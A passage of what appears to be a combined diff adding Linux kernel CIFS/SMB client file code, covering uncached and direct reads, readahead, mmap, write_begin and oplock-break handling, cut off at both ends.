++	} while (len > 0);
++
++	return rc;
++}
++
++static void
++collect_uncached_read_data(struct cifs_aio_ctx *ctx)
++{
++	struct cifs_readdata *rdata, *tmp;
++	struct iov_iter *to = &ctx->iter;
++	struct cifs_sb_info *cifs_sb;
++	int rc;
++
++	cifs_sb = CIFS_SB(ctx->cfile->dentry->d_sb);
++
++	mutex_lock(&ctx->aio_mutex);
++
++	if (list_empty(&ctx->list)) {
++		mutex_unlock(&ctx->aio_mutex);
++		return;
++	}
++
++	rc = ctx->rc;
++	/* the loop below should proceed in the order of increasing offsets */
++again:
++	list_for_each_entry_safe(rdata, tmp, &ctx->list, list) {
++		if (!rc) {
++			if (!try_wait_for_completion(&rdata->done)) {
++				mutex_unlock(&ctx->aio_mutex);
++				return;
++			}
++
++			if (rdata->result == -EAGAIN) {
++				/* resend call if it's a retryable error */
++				struct list_head tmp_list;
++				unsigned int got_bytes = rdata->got_bytes;
++
++				list_del_init(&rdata->list);
++				INIT_LIST_HEAD(&tmp_list);
++
++				/*
++				 * Got a part of data and then reconnect has
++				 * happened -- fill the buffer and continue
++				 * reading.
++				 */
++				if (got_bytes && got_bytes < rdata->bytes) {
++					rc = 0;
++					if (!ctx->direct_io)
++						rc = cifs_readdata_to_iov(rdata, to);
++					if (rc) {
++						kref_put(&rdata->refcount,
++							cifs_uncached_readdata_release);
++						continue;
++					}
++				}
++
++				if (ctx->direct_io) {
++					/*
++					 * Re-use rdata as this is a
++					 * direct I/O
++					 */
++					rc = cifs_resend_rdata(
++						rdata,
++						&tmp_list, ctx);
++				} else {
++					rc = cifs_send_async_read(
++						rdata->offset + got_bytes,
++						rdata->bytes - got_bytes,
++						rdata->cfile, cifs_sb,
++						&tmp_list, ctx);
++
++					kref_put(&rdata->refcount,
++						cifs_uncached_readdata_release);
++				}
++
++				list_splice(&tmp_list, &ctx->list);
++
++				goto again;
++			} else if (rdata->result)
++				rc = rdata->result;
++			else if (!ctx->direct_io)
++				rc = cifs_readdata_to_iov(rdata, to);
++
++			/* if there was a short read -- discard anything left */
++			if (rdata->got_bytes && rdata->got_bytes < rdata->bytes)
++				rc = -ENODATA;
++
++			ctx->total_len += rdata->got_bytes;
++		}
++		list_del_init(&rdata->list);
++		kref_put(&rdata->refcount, cifs_uncached_readdata_release);
++	}
++
++	if (!ctx->direct_io)
++		ctx->total_len = ctx->len - iov_iter_count(to);
++
++	/* mask nodata case */
++	if (rc == -ENODATA)
++		rc = 0;
++
++	ctx->rc = (rc == 0) ? (ssize_t)ctx->total_len : rc;
++
++	mutex_unlock(&ctx->aio_mutex);
++
++	if (ctx->iocb && ctx->iocb->ki_complete)
++		ctx->iocb->ki_complete(ctx->iocb, ctx->rc);
++	else
++		complete(&ctx->done);
++}
++
++static ssize_t __cifs_readv(
++	struct kiocb *iocb, struct iov_iter *to, bool direct)
++{
++	size_t len;
++	struct file *file = iocb->ki_filp;
++	struct cifs_sb_info *cifs_sb;
++	struct cifsFileInfo *cfile;
++	struct cifs_tcon *tcon;
++	ssize_t rc, total_read = 0;
++	loff_t offset = iocb->ki_pos;
++	struct cifs_aio_ctx *ctx;
++
++	/*
++	 * iov_iter_get_pages_alloc() doesn't work with ITER_KVEC,
++	 * fall back to data copy read path
++	 * this could be improved by getting pages directly in ITER_KVEC
++	 */
++	if (direct && iov_iter_is_kvec(to)) {
++		cifs_dbg(FYI, "use non-direct cifs_user_readv for kvec I/O\n");
++		direct = false;
++	}
++
++	len = iov_iter_count(to);
++	if (!len)
++		return 0;
++
++	cifs_sb = CIFS_FILE_SB(file);
++	cfile = file->private_data;
++	tcon = tlink_tcon(cfile->tlink);
++
++	if (!tcon->ses->server->ops->async_readv)
++		return -ENOSYS;
++
++	if ((file->f_flags & O_ACCMODE) == O_WRONLY)
++		cifs_dbg(FYI, "attempting read on write only file instance\n");
++
++	ctx = cifs_aio_ctx_alloc();
++	if (!ctx)
++		return -ENOMEM;
++
++	ctx->cfile = cifsFileInfo_get(cfile);
++
++	if (!is_sync_kiocb(iocb))
++		ctx->iocb = iocb;
++
++	if (user_backed_iter(to))
++		ctx->should_dirty = true;
++
++	if (direct) {
++		ctx->pos = offset;
++		ctx->direct_io = true;
++		ctx->iter = *to;
++		ctx->len = len;
++	} else {
++		rc = setup_aio_ctx_iter(ctx, to, ITER_DEST);
++		if (rc) {
++			kref_put(&ctx->refcount, cifs_aio_ctx_release);
++			return rc;
++		}
++		len = ctx->len;
++	}
++
++	if (direct) {
++		rc = filemap_write_and_wait_range(file->f_inode->i_mapping,
++						  offset, offset + len - 1);
++		if (rc) {
++			kref_put(&ctx->refcount, cifs_aio_ctx_release);
++			return -EAGAIN;
++		}
++	}
++
++	/* grab a lock here due to read response handlers can access ctx */
++	mutex_lock(&ctx->aio_mutex);
++
++	rc = cifs_send_async_read(offset, len, cfile, cifs_sb, &ctx->list, ctx);
++
++	/* if at least one read request send succeeded, then reset rc */
++	if (!list_empty(&ctx->list))
++		rc = 0;
++
++	mutex_unlock(&ctx->aio_mutex);
++
++	if (rc) {
++		kref_put(&ctx->refcount, cifs_aio_ctx_release);
++		return rc;
++	}
++
++	if (!is_sync_kiocb(iocb)) {
++		kref_put(&ctx->refcount, cifs_aio_ctx_release);
++		return -EIOCBQUEUED;
++	}
++
++	rc = wait_for_completion_killable(&ctx->done);
++	if (rc) {
++		mutex_lock(&ctx->aio_mutex);
++		ctx->rc = rc = -EINTR;
++		total_read = ctx->total_len;
++		mutex_unlock(&ctx->aio_mutex);
++	} else {
++		rc = ctx->rc;
++		total_read = ctx->total_len;
++	}
++
++	kref_put(&ctx->refcount, cifs_aio_ctx_release);
++
++	if (total_read) {
++		iocb->ki_pos += total_read;
++		return total_read;
++	}
++	return rc;
++}
++
++ssize_t cifs_direct_readv(struct kiocb *iocb, struct iov_iter *to)
++{
++	return __cifs_readv(iocb, to, true);
++}
++
++ssize_t cifs_user_readv(struct kiocb *iocb, struct iov_iter *to)
++{
++	return __cifs_readv(iocb, to, false);
++}
++
++ssize_t
++cifs_strict_readv(struct kiocb *iocb, struct iov_iter *to)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct cifsInodeInfo *cinode = CIFS_I(inode);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct cifsFileInfo *cfile = (struct cifsFileInfo *)
++						iocb->ki_filp->private_data;
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++	int rc = -EACCES;
++
++	/*
++	 * In strict cache mode we need to read from the server all the time
++	 * if we don't have level II oplock because the server can delay mtime
++	 * change - so we can't make a decision about inode invalidating.
++	 * And we can also fail with pagereading if there are mandatory locks
++	 * on pages affected by this read but not on the region from pos to
++	 * pos+len-1.
++	 */
++	if (!CIFS_CACHE_READ(cinode))
++		return cifs_user_readv(iocb, to);
++
++	if (cap_unix(tcon->ses) &&
++	    (CIFS_UNIX_FCNTL_CAP & le64_to_cpu(tcon->fsUnixInfo.Capability)) &&
++	    ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL) == 0))
++		return generic_file_read_iter(iocb, to);
++
++	/*
++	 * We need to hold the sem to be sure nobody modifies lock list
++	 * with a brlock that prevents reading.
++	 */
++	down_read(&cinode->lock_sem);
++	if (!cifs_find_lock_conflict(cfile, iocb->ki_pos, iov_iter_count(to),
++				     tcon->ses->server->vals->shared_lock_type,
++				     0, NULL, CIFS_READ_OP))
++		rc = generic_file_read_iter(iocb, to);
++	up_read(&cinode->lock_sem);
++	return rc;
++}
++
++static ssize_t
++cifs_read(struct file *file, char *read_data, size_t read_size, loff_t *offset)
++{
++	int rc = -EACCES;
++	unsigned int bytes_read = 0;
++	unsigned int total_read;
++	unsigned int current_read_size;
++	unsigned int rsize;
++	struct cifs_sb_info *cifs_sb;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	unsigned int xid;
++	char *cur_offset;
++	struct cifsFileInfo *open_file;
++	struct cifs_io_parms io_parms = {0};
++	int buf_type = CIFS_NO_BUFFER;
++	__u32 pid;
++
++	xid = get_xid();
++	cifs_sb = CIFS_FILE_SB(file);
++
++	/* FIXME: set up handlers for larger reads and/or convert to async */
++	rsize = min_t(unsigned int, cifs_sb->ctx->rsize, CIFSMaxBufSize);
++
++	if (file->private_data == NULL) {
++		rc = -EBADF;
++		free_xid(xid);
++		return rc;
++	}
++	open_file = file->private_data;
++	tcon = tlink_tcon(open_file->tlink);
++	server = cifs_pick_channel(tcon->ses);
++
++	if (!server->ops->sync_read) {
++		free_xid(xid);
++		return -ENOSYS;
++	}
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
++		pid = open_file->pid;
++	else
++		pid = current->tgid;
++
++	if ((file->f_flags & O_ACCMODE) == O_WRONLY)
++		cifs_dbg(FYI, "attempting read on write only file instance\n");
++
++	for (total_read = 0, cur_offset = read_data; read_size > total_read;
++	     total_read += bytes_read, cur_offset += bytes_read) {
++		do {
++			current_read_size = min_t(uint, read_size - total_read,
++						  rsize);
++			/*
++			 * For windows me and 9x we do not want to request more
++			 * than it negotiated since it will refuse the read
++			 * then.
++			 */
++			if (!(tcon->ses->capabilities &
++				tcon->ses->server->vals->cap_large_files)) {
++				current_read_size = min_t(uint,
++					current_read_size, CIFSMaxBufSize);
++			}
++			if (open_file->invalidHandle) {
++				rc = cifs_reopen_file(open_file, true);
++				if (rc != 0)
++					break;
++			}
++			io_parms.pid = pid;
++			io_parms.tcon = tcon;
++			io_parms.offset = *offset;
++			io_parms.length = current_read_size;
++			io_parms.server = server;
++			rc = server->ops->sync_read(xid, &open_file->fid, &io_parms,
++						    &bytes_read, &cur_offset,
++						    &buf_type);
++		} while (rc == -EAGAIN);
++
++		if (rc || (bytes_read == 0)) {
++			if (total_read) {
++				break;
++			} else {
++				free_xid(xid);
++				return rc;
++			}
++		} else {
++			cifs_stats_bytes_read(tcon, total_read);
++			*offset += bytes_read;
++		}
++	}
++	free_xid(xid);
++	return total_read;
++}
++
++/*
++ * If the page is mmap'ed into a process' page tables, then we need to make
++ * sure that it doesn't change while being written back.
++ */
++static vm_fault_t
++cifs_page_mkwrite(struct vm_fault *vmf)
++{
++	struct page *page = vmf->page;
++
++	/* Wait for the page to be written to the cache before we allow it to
++	 * be modified.  We then assume the entire page will need writing back.
++	 */
++#ifdef CONFIG_CIFS_FSCACHE
++	if (PageFsCache(page) &&
++	    wait_on_page_fscache_killable(page) < 0)
++		return VM_FAULT_RETRY;
++#endif
++
++	wait_on_page_writeback(page);
++
++	if (lock_page_killable(page) < 0)
++		return VM_FAULT_RETRY;
++	return VM_FAULT_LOCKED;
++}
++
++static const struct vm_operations_struct cifs_file_vm_ops = {
++	.fault = filemap_fault,
++	.map_pages = filemap_map_pages,
++	.page_mkwrite = cifs_page_mkwrite,
++};
++
++int cifs_file_strict_mmap(struct file *file, struct vm_area_struct *vma)
++{
++	int xid, rc = 0;
++	struct inode *inode = file_inode(file);
++
++	xid = get_xid();
++
++	if (!CIFS_CACHE_READ(CIFS_I(inode)))
++		rc = cifs_zap_mapping(inode);
++	if (!rc)
++		rc = generic_file_mmap(file, vma);
++	if (!rc)
++		vma->vm_ops = &cifs_file_vm_ops;
++
++	free_xid(xid);
++	return rc;
++}
++
++int cifs_file_mmap(struct file *file, struct vm_area_struct *vma)
++{
++	int rc, xid;
++
++	xid = get_xid();
++
++	rc = cifs_revalidate_file(file);
++	if (rc)
++		cifs_dbg(FYI, "Validation prior to mmap failed, error=%d\n",
++			 rc);
++	if (!rc)
++		rc = generic_file_mmap(file, vma);
++	if (!rc)
++		vma->vm_ops = &cifs_file_vm_ops;
++
++	free_xid(xid);
++	return rc;
++}
++
++static void
++cifs_readv_complete(struct work_struct *work)
++{
++	unsigned int i, got_bytes;
++	struct cifs_readdata *rdata = container_of(work,
++						struct cifs_readdata, work);
++
++	got_bytes = rdata->got_bytes;
++	for (i = 0; i < rdata->nr_pages; i++) {
++		struct page *page = rdata->pages[i];
++
++		if (rdata->result == 0 ||
++		    (rdata->result == -EAGAIN && got_bytes)) {
++			flush_dcache_page(page);
++			SetPageUptodate(page);
++		} else
++			SetPageError(page);
++
++		if (rdata->result == 0 ||
++		    (rdata->result == -EAGAIN && got_bytes))
++			cifs_readpage_to_fscache(rdata->mapping->host, page);
++
++		unlock_page(page);
++
++		got_bytes -= min_t(unsigned int, PAGE_SIZE, got_bytes);
++
++		put_page(page);
++		rdata->pages[i] = NULL;
++	}
++	kref_put(&rdata->refcount, cifs_readdata_release);
++}
++
++static int
++readpages_fill_pages(struct TCP_Server_Info *server,
++		     struct cifs_readdata *rdata, struct iov_iter *iter,
++		     unsigned int len)
++{
++	int result = 0;
++	unsigned int i;
++	u64 eof;
++	pgoff_t eof_index;
++	unsigned int nr_pages = rdata->nr_pages;
++	unsigned int page_offset = rdata->page_offset;
++
++	/* determine the eof that the server (probably) has */
++	eof = CIFS_I(rdata->mapping->host)->server_eof;
++	eof_index = eof ? (eof - 1) >> PAGE_SHIFT : 0;
++	cifs_dbg(FYI, "eof=%llu eof_index=%lu\n", eof, eof_index);
++
++	rdata->got_bytes = 0;
++	rdata->tailsz = PAGE_SIZE;
++	for (i = 0; i < nr_pages; i++) {
++		struct page *page = rdata->pages[i];
++		unsigned int to_read = rdata->pagesz;
++		size_t n;
++
++		if (i == 0)
++			to_read -= page_offset;
++		else
++			page_offset = 0;
++
++		n = to_read;
++
++		if (len >= to_read) {
++			len -= to_read;
++		} else if (len > 0) {
++			/* enough for partial page, fill and zero the rest */
++			zero_user(page, len + page_offset, to_read - len);
++			n = rdata->tailsz = len;
++			len = 0;
++		} else if (page->index > eof_index) {
++			/*
++			 * The VFS will not try to do readahead past the
++			 * i_size, but it's possible that we have outstanding
++			 * writes with gaps in the middle and the i_size hasn't
++			 * caught up yet. Populate those with zeroed out pages
++			 * to prevent the VFS from repeatedly attempting to
++			 * fill them until the writes are flushed.
++			 */
++			zero_user(page, 0, PAGE_SIZE);
++			flush_dcache_page(page);
++			SetPageUptodate(page);
++			unlock_page(page);
++			put_page(page);
++			rdata->pages[i] = NULL;
++			rdata->nr_pages--;
++			continue;
++		} else {
++			/* no need to hold page hostage */
++			unlock_page(page);
++			put_page(page);
++			rdata->pages[i] = NULL;
++			rdata->nr_pages--;
++			continue;
++		}
++
++		if (iter)
++			result = copy_page_from_iter(
++					page, page_offset, n, iter);
++#ifdef CONFIG_CIFS_SMB_DIRECT
++		else if (rdata->mr)
++			result = n;
++#endif
++		else
++			result = cifs_read_page_from_socket(
++					server, page, page_offset, n);
++		if (result < 0)
++			break;
++
++		rdata->got_bytes += result;
++	}
++
++	return result != -ECONNABORTED && rdata->got_bytes > 0 ?
++						rdata->got_bytes : result;
++}
++
++static int
++cifs_readpages_read_into_pages(struct TCP_Server_Info *server,
++			       struct cifs_readdata *rdata, unsigned int len)
++{
++	return readpages_fill_pages(server, rdata, NULL, len);
++}
++
++static int
++cifs_readpages_copy_into_pages(struct TCP_Server_Info *server,
++			       struct cifs_readdata *rdata,
++			       struct iov_iter *iter)
++{
++	return readpages_fill_pages(server, rdata, iter, iter->count);
++}
++
++static void cifs_readahead(struct readahead_control *ractl)
++{
++	int rc;
++	struct cifsFileInfo *open_file = ractl->file->private_data;
++	struct cifs_sb_info *cifs_sb = CIFS_FILE_SB(ractl->file);
++	struct TCP_Server_Info *server;
++	pid_t pid;
++	unsigned int xid, nr_pages, last_batch_size = 0, cache_nr_pages = 0;
++	pgoff_t next_cached = ULONG_MAX;
++	bool caching = fscache_cookie_enabled(cifs_inode_cookie(ractl->mapping->host)) &&
++		cifs_inode_cookie(ractl->mapping->host)->cache_priv;
++	bool check_cache = caching;
++
++	xid = get_xid();
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
++		pid = open_file->pid;
++	else
++		pid = current->tgid;
++
++	rc = 0;
++	server = cifs_pick_channel(tlink_tcon(open_file->tlink)->ses);
++
++	cifs_dbg(FYI, "%s: file=%p mapping=%p num_pages=%u\n",
++		 __func__, ractl->file, ractl->mapping, readahead_count(ractl));
++
++	/*
++	 * Chop the readahead request up into rsize-sized read requests.
++	 */
++	while ((nr_pages = readahead_count(ractl) - last_batch_size)) {
++		unsigned int i, got, rsize;
++		struct page *page;
++		struct cifs_readdata *rdata;
++		struct cifs_credits credits_on_stack;
++		struct cifs_credits *credits = &credits_on_stack;
++		pgoff_t index = readahead_index(ractl) + last_batch_size;
++
++		/*
++		 * Find out if we have anything cached in the range of
++		 * interest, and if so, where the next chunk of cached data is.
++		 */
++		if (caching) {
++			if (check_cache) {
++				rc = cifs_fscache_query_occupancy(
++					ractl->mapping->host, index, nr_pages,
++					&next_cached, &cache_nr_pages);
++				if (rc < 0)
++					caching = false;
++				check_cache = false;
++			}
++
++			if (index == next_cached) {
++				/*
++				 * TODO: Send a whole batch of pages to be read
++				 * by the cache.
++				 */
++				struct folio *folio = readahead_folio(ractl);
++
++				last_batch_size = folio_nr_pages(folio);
++				if (cifs_readpage_from_fscache(ractl->mapping->host,
++							       &folio->page) < 0) {
++					/*
++					 * TODO: Deal with cache read failure
++					 * here, but for the moment, delegate
++					 * that to readpage.
++					 */
++					caching = false;
++				}
++				folio_unlock(folio);
++				next_cached++;
++				cache_nr_pages--;
++				if (cache_nr_pages == 0)
++					check_cache = true;
++				continue;
++			}
++		}
++
++		if (open_file->invalidHandle) {
++			rc = cifs_reopen_file(open_file, true);
++			if (rc) {
++				if (rc == -EAGAIN)
++					continue;
++				break;
++			}
++		}
++
++		if (cifs_sb->ctx->rsize == 0)
++			cifs_sb->ctx->rsize =
++				server->ops->negotiate_rsize(tlink_tcon(open_file->tlink),
++							     cifs_sb->ctx);
++
++		rc = server->ops->wait_mtu_credits(server, cifs_sb->ctx->rsize,
++						   &rsize, credits);
++		if (rc)
++			break;
++		nr_pages = min_t(size_t, rsize / PAGE_SIZE, readahead_count(ractl));
++		nr_pages = min_t(size_t, nr_pages, next_cached - index);
++
++		/*
++		 * Give up immediately if rsize is too small to read an entire
++		 * page. The VFS will fall back to readpage. We should never
++		 * reach this point however since we set ra_pages to 0 when the
++		 * rsize is smaller than a cache page.
++		 */
++		if (unlikely(!nr_pages)) {
++			add_credits_and_wake_if(server, credits, 0);
++			break;
++		}
++
++		rdata = cifs_readdata_alloc(nr_pages, cifs_readv_complete);
++		if (!rdata) {
++			/* best to give up if we're out of mem */
++			add_credits_and_wake_if(server, credits, 0);
++			break;
++		}
++
++		got = __readahead_batch(ractl, rdata->pages, nr_pages);
++		if (got != nr_pages) {
++			pr_warn("__readahead_batch() returned %u/%u\n",
++				got, nr_pages);
++			nr_pages = got;
++		}
++
++		rdata->nr_pages = nr_pages;
++		rdata->bytes	= readahead_batch_length(ractl);
++		rdata->cfile	= cifsFileInfo_get(open_file);
++		rdata->server	= server;
++		rdata->mapping	= ractl->mapping;
++		rdata->offset	= readahead_pos(ractl);
++		rdata->pid	= pid;
++		rdata->pagesz	= PAGE_SIZE;
++		rdata->tailsz	= PAGE_SIZE;
++		rdata->read_into_pages = cifs_readpages_read_into_pages;
++		rdata->copy_into_pages = cifs_readpages_copy_into_pages;
++		rdata->credits	= credits_on_stack;
++
++		rc = adjust_credits(server, &rdata->credits, rdata->bytes);
++		if (!rc) {
++			if (rdata->cfile->invalidHandle)
++				rc = -EAGAIN;
++			else
++				rc = server->ops->async_readv(rdata);
++		}
++
++		if (rc) {
++			add_credits_and_wake_if(server, &rdata->credits, 0);
++			for (i = 0; i < rdata->nr_pages; i++) {
++				page = rdata->pages[i];
++				unlock_page(page);
++				put_page(page);
++			}
++			/* Fallback to the readpage in error/reconnect cases */
++			kref_put(&rdata->refcount, cifs_readdata_release);
++			break;
++		}
++
++		kref_put(&rdata->refcount, cifs_readdata_release);
++		last_batch_size = nr_pages;
++	}
++
++	free_xid(xid);
++}
++
++/*
++ * cifs_readpage_worker must be called with the page pinned
++ */
++static int cifs_readpage_worker(struct file *file, struct page *page,
++	loff_t *poffset)
++{
++	char *read_data;
++	int rc;
++
++	/* Is the page cached? */
++	rc = cifs_readpage_from_fscache(file_inode(file), page);
++	if (rc == 0)
++		goto read_complete;
++
++	read_data = kmap(page);
++	/* for reads over a certain size could initiate async read ahead */
++
++	rc = cifs_read(file, read_data, PAGE_SIZE, poffset);
++
++	if (rc < 0)
++		goto io_error;
++	else
++		cifs_dbg(FYI, "Bytes read %d\n", rc);
++
++	/* we do not want atime to be less than mtime, it broke some apps */
++	file_inode(file)->i_atime = current_time(file_inode(file));
++	if (timespec64_compare(&(file_inode(file)->i_atime), &(file_inode(file)->i_mtime)))
++		file_inode(file)->i_atime = file_inode(file)->i_mtime;
++	else
++		file_inode(file)->i_atime = current_time(file_inode(file));
++
++	if (PAGE_SIZE > rc)
++		memset(read_data + rc, 0, PAGE_SIZE - rc);
++
++	flush_dcache_page(page);
++	SetPageUptodate(page);
++
++	/* send this page to the cache */
++	cifs_readpage_to_fscache(file_inode(file), page);
++
++	rc = 0;
++
++io_error:
++	kunmap(page);
++	unlock_page(page);
++
++read_complete:
++	return rc;
++}
++
++static int cifs_read_folio(struct file *file, struct folio *folio)
++{
++	struct page *page = &folio->page;
++	loff_t offset = page_file_offset(page);
++	int rc = -EACCES;
++	unsigned int xid;
++
++	xid = get_xid();
++
++	if (file->private_data == NULL) {
++		rc = -EBADF;
++		free_xid(xid);
++		return rc;
++	}
++
++	cifs_dbg(FYI, "read_folio %p at offset %d 0x%x\n",
++		 page, (int)offset, (int)offset);
++
++	rc = cifs_readpage_worker(file, page, &offset);
++
++	free_xid(xid);
++	return rc;
++}
++
++static int is_inode_writable(struct cifsInodeInfo *cifs_inode)
++{
++	struct cifsFileInfo *open_file;
++
++	spin_lock(&cifs_inode->open_file_lock);
++	list_for_each_entry(open_file, &cifs_inode->openFileList, flist) {
++		if (OPEN_FMODE(open_file->f_flags) & FMODE_WRITE) {
++			spin_unlock(&cifs_inode->open_file_lock);
++			return 1;
++		}
++	}
++	spin_unlock(&cifs_inode->open_file_lock);
++	return 0;
++}
++
++/* We do not want to update the file size from server for inodes
++   open for write - to avoid races with writepage extending
++   the file - in the future we could consider allowing
++   refreshing the inode only on increases in the file size
++   but this is tricky to do without racing with writebehind
++   page caching in the current Linux kernel design */
++bool is_size_safe_to_change(struct cifsInodeInfo *cifsInode, __u64 end_of_file)
++{
++	if (!cifsInode)
++		return true;
++
++	if (is_inode_writable(cifsInode)) {
++		/* This inode is open for write at least once */
++		struct cifs_sb_info *cifs_sb;
++
++		cifs_sb = CIFS_SB(cifsInode->netfs.inode.i_sb);
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DIRECT_IO) {
++			/* since no page cache to corrupt on directio
++			we can change size safely */
++			return true;
++		}
++
++		if (i_size_read(&cifsInode->netfs.inode) < end_of_file)
++			return true;
++
++		return false;
++	} else
++		return true;
++}
++
++static int cifs_write_begin(struct file *file, struct address_space *mapping,
++			loff_t pos, unsigned len,
++			struct page **pagep, void **fsdata)
++{
++	int oncethru = 0;
++	pgoff_t index = pos >> PAGE_SHIFT;
++	loff_t offset = pos & (PAGE_SIZE - 1);
++	loff_t page_start = pos & PAGE_MASK;
++	loff_t i_size;
++	struct page *page;
++	int rc = 0;
++
++	cifs_dbg(FYI, "write_begin from %lld len %d\n", (long long)pos, len);
++
++start:
++	page = grab_cache_page_write_begin(mapping, index);
++	if (!page) {
++		rc = -ENOMEM;
++		goto out;
++	}
++
++	if (PageUptodate(page))
++		goto out;
++
++	/*
++	 * If we write a full page it will be up to date, no need to read from
++	 * the server. If the write is short, we'll end up doing a sync write
++	 * instead.
++	 */
++	if (len == PAGE_SIZE)
++		goto out;
++
++	/*
++	 * optimize away the read when we have an oplock, and we're not
++	 * expecting to use any of the data we'd be reading in. That
++	 * is, when the page lies beyond the EOF, or straddles the EOF
++	 * and the write will cover all of the existing data.
++	 */
++	if (CIFS_CACHE_READ(CIFS_I(mapping->host))) {
++		i_size = i_size_read(mapping->host);
++		if (page_start >= i_size ||
++		    (offset == 0 && (pos + len) >= i_size)) {
++			zero_user_segments(page, 0, offset,
++					   offset + len,
++					   PAGE_SIZE);
++			/*
++			 * PageChecked means that the parts of the page
++			 * to which we're not writing are considered up
++			 * to date. Once the data is copied to the
++			 * page, it can be set uptodate.
++			 */
++			SetPageChecked(page);
++			goto out;
++		}
++	}
++
++	if ((file->f_flags & O_ACCMODE) != O_WRONLY && !oncethru) {
++		/*
++		 * might as well read a page, it is fast enough. If we get
++		 * an error, we don't need to return it. cifs_write_end will
++		 * do a sync write instead since PG_uptodate isn't set.
++		 */
++		cifs_readpage_worker(file, page, &page_start);
++		put_page(page);
++		oncethru = 1;
++		goto start;
++	} else {
++		/* we could try using another file handle if there is one -
++		   but how would we lock it to prevent close of that handle
++		   racing with this read? In any case
++		   this will be written out by write_end so is fine */
++	}
++out:
++	*pagep = page;
++	return rc;
++}
++
++static bool cifs_release_folio(struct folio *folio, gfp_t gfp)
++{
++	if (folio_test_private(folio))
++		return 0;
++	if (folio_test_fscache(folio)) {
++		if (current_is_kswapd() || !(gfp & __GFP_FS))
++			return false;
++		folio_wait_fscache(folio);
++	}
++	fscache_note_page_release(cifs_inode_cookie(folio->mapping->host));
++	return true;
++}
++
++static void cifs_invalidate_folio(struct folio *folio, size_t offset,
++				 size_t length)
++{
++	folio_wait_fscache(folio);
++}
++
++static int cifs_launder_folio(struct folio *folio)
++{
++	int rc = 0;
++	loff_t range_start = folio_pos(folio);
++	loff_t range_end = range_start + folio_size(folio);
++	struct writeback_control wbc = {
++		.sync_mode = WB_SYNC_ALL,
++		.nr_to_write = 0,
++		.range_start = range_start,
++		.range_end = range_end,
++	};
++
++	cifs_dbg(FYI, "Launder page: %lu\n", folio->index);
++
++	if (folio_clear_dirty_for_io(folio))
++		rc = cifs_writepage_locked(&folio->page, &wbc);
++
++	folio_wait_fscache(folio);
++	return rc;
++}
++
++void cifs_oplock_break(struct work_struct *work)
++{
++	struct cifsFileInfo *cfile = container_of(work, struct cifsFileInfo,
++						  oplock_break);
++	struct inode *inode = d_inode(cfile->dentry);
++	struct cifsInodeInfo *cinode = CIFS_I(inode);
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++	struct TCP_Server_Info *server = tcon->ses->server;
++	int rc = 0;
++	bool purge_cache = false, oplock_break_cancelled;
++	__u64 persistent_fid, volatile_fid;
++	__u16 net_fid;
++
++	wait_on_bit(&cinode->flags, CIFS_INODE_PENDING_WRITERS,
++			TASK_UNINTERRUPTIBLE);
++
++	server->ops->downgrade_oplock(server, cinode, cfile->oplock_level,
++				      cfile->oplock_epoch, &purge_cache);
++
++	if (!CIFS_CACHE_WRITE(cinode) && CIFS_CACHE_READ(cinode) &&
++						cifs_has_mand_locks(cinode)) {
++		cifs_dbg(FYI, "Reset oplock to None for inode=%p due to mand locks\n",
++			 inode);
++		cinode->oplock = 0;
++	}
++
++	if (inode && S_ISREG(inode->i_mode)) {
++		if (CIFS_CACHE_READ(cinode))
++			break_lease(inode, O_RDONLY);
++		else
++			break_lease(inode, O_WRONLY);
++		rc = filemap_fdatawrite(inode->i_mapping);
++		if (!CIFS_CACHE_READ(cinode) || purge_cache) {
++			rc = filemap_fdatawait(inode->i_mapping);
++			mapping_set_error(inode->i_mapping, rc);
++			cifs_zap_mapping(inode);
++		}
++		cifs_dbg(FYI, "Oplock flush inode %p rc %d\n", inode, rc);
++		if (CIFS_CACHE_WRITE(cinode))
++			goto oplock_break_ack;
++	}
++
++	rc = cifs_push_locks(cfile);
++	if (rc)
++		cifs_dbg(VFS, "Push locks rc = %d\n", rc);
++
++oplock_break_ack:
++	/*
++	 * When oplock break is received and there are no active
++	 * file handles but cached, then schedule deferred close immediately.
++	 * So, new open will not use cached handle.
++	 */
++
++	if (!CIFS_CACHE_HANDLE(cinode) && !list_empty(&cinode->deferred_closes))
++		cifs_close_deferred_file(cinode);
++
++	persistent_fid = cfile->fid.persistent_fid;
++	volatile_fid = cfile->fid.volatile_fid;
++	net_fid = cfile->fid.netfid;
++	oplock_break_cancelled = cfile->oplock_break_cancelled;
++
++	_cifsFileInfo_put(cfile, false /* do not wait for ourself */, false);
++	/*
++	 * releasing stale oplock after recent reconnect of smb session using
++	 * a now incorrect file handle is not a data integrity issue but do
++	 * not bother sending an oplock release if session to server still is
++	 * disconnected since oplock already released by the server
++	 */
++	if (!oplock_break_cancelled) {
++		/* check for server null since can race with kill_sb calling tree disconnect */
++		if (tcon->ses && tcon->ses->server) {
++			rc = tcon->ses->server->ops->oplock_response(tcon, persistent_fid,
++				volatile_fid, net_fid, cinode);
++			cifs_dbg(FYI, "Oplock release rc = %d\n", rc);
++		} else
++			pr_warn_once("lease break not sent for unmounted share\n");
++	}
++
++	cifs_done_oplock_break(cinode);
++}
++
++/*
++ * The presence of cifs_direct_io() in the address space ops vector
++ * allowes open() O_DIRECT flags which would have failed otherwise.
++ *
++ * In the non-cached mode (mount with cache=none), we shunt off direct read and write requests
++ * so this method should never be called.
++ *
++ * Direct IO is not yet supported in the cached mode.
++ */
++static ssize_t
++cifs_direct_io(struct kiocb *iocb, struct iov_iter *iter)
++{
++        /*
++         * FIXME
++         * Eventually need to support direct IO for non forcedirectio mounts
++         */
++        return -EINVAL;
++}
++
++static int cifs_swap_activate(struct swap_info_struct *sis,
++			      struct file *swap_file, sector_t *span)
++{
++	struct cifsFileInfo *cfile = swap_file->private_data;
++	struct inode *inode = swap_file->f_mapping->host;
++	unsigned long blocks;
++	long long isize;
++
++	cifs_dbg(FYI, "swap activate\n");
++
++	if (!swap_file->f_mapping->a_ops->swap_rw)
++		/* Cannot support swap */
++		return -EINVAL;
++
++	spin_lock(&inode->i_lock);
